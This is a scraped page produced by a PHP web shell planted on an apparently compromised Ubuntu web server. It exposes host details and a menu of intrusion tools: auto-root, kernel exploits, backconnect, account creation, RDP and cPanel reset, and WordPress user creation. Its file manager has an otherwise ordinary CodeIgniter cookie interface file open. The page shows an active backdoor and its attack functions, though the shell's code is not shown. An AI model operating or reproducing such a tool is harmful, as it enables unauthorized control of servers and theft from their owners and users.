Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
system /
Cookie /
[ HOME SHELL ]
Name
Size
Permission
Action
Exceptions
[ DIR ]
drwxr-x--x
CloneableCookieInterface.php
2.36
KB
-rwxr-x--x
Cookie.php
18.88
KB
-rwxr-x--x
CookieInterface.php
4.18
KB
-rwxr-x--x
CookieStore.php
6.08
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CloneableCookieInterface.php
<?php /** * This file is part of CodeIgniter 4 framework. * * (c) CodeIgniter Foundation <admin@codeigniter.com> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ namespace CodeIgniter\Cookie; use DateTimeInterface; /** * Interface for a fresh Cookie instance with selected attribute(s) * only changed from the original instance. */ interface CloneableCookieInterface extends CookieInterface { /** * Creates a new Cookie with a new cookie prefix. * * @return static */ public function withPrefix(string $prefix = ''); /** * Creates a new Cookie with a new name. * * @return static */ public function withName(string $name); /** * Creates a new Cookie with new value. * * @return static */ public function withValue(string $value); /** * Creates a new Cookie with a new cookie expires time. * * @param DateTimeInterface|int|string $expires * * @return static */ public function withExpires($expires); /** * Creates a new Cookie that will expire the cookie from the browser. * * @return static */ public function withExpired(); /** * Creates a new Cookie that will virtually never expire from the browser. * * @return static */ public function withNeverExpiring(); /** * Creates a new Cookie with a new path on the server the cookie is available. * * @return static */ public function withPath(?string $path); /** * Creates a new Cookie with a new domain the cookie is available. * * @return static */ public function withDomain(?string $domain); /** * Creates a new Cookie with a new "Secure" attribute. * * @return static */ public function withSecure(bool $secure = true); /** * Creates a new Cookie with a new "HttpOnly" attribute * * @return static */ public function withHTTPOnly(bool $httponly = true); /** * Creates a new Cookie with a new "SameSite" attribute. * * @return static */ public function withSameSite(string $samesite); /** * Creates a new Cookie with URL encoding option updated. * * @return static */ public function withRaw(bool $raw = true); }
Close